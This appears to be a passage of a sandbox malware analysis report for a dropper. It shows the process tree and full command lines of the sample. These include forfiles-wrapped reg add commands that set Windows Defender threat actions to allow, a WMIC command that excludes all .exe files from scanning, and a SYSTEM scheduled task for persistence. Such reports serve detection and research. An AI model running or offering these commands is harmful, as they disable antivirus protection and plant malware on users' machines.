Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3908 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe
PID 3908 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe
PID 3908 wrote to memory of 4108 N/A C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe
PID 4108 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe
PID 4108 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe
PID 4108 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe
PID 4416 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 1956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4644 wrote to memory of 984 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4644 wrote to memory of 984 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4644 wrote to memory of 984 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 984 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 984 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 984 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4812 wrote to memory of 204 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 204 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 204 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 204 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 204 wrote to memory of 1364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1280 wrote to memory of 292 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 292 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1280 wrote to memory of 292 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 292 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 292 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 292 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4040 wrote to memory of 4432 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4040 wrote to memory of 4432 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4040 wrote to memory of 4432 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4432 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4432 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 4432 wrote to memory of 1764 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1956 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 1956 wrote to memory of 4256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4256 wrote to memory of 3400 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3400 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4256 wrote to memory of 3400 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3400 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3400 wrote to memory of 1856 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1288 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 1856 wrote to memory of 1288 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 1856 wrote to memory of 1288 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 4416 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4416 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4416 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3836 wrote to memory of 2196 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 2196 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3836 wrote to memory of 2196 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2196 wrote to memory of 3772 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe

"C:\Users\Admin\AppData\Local\Temp\54f4741d8a7213f7d34c7d3ebbb5777f65b33528a3e37a6fccd43c1e4be61112.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6189.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe

.\Install.exe /WzmdidRUAH "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 22:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe\" Yw /ADediduEuB 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bcicWGWSPuqTxjDSpV

C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe Yw /ADediduEuB 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

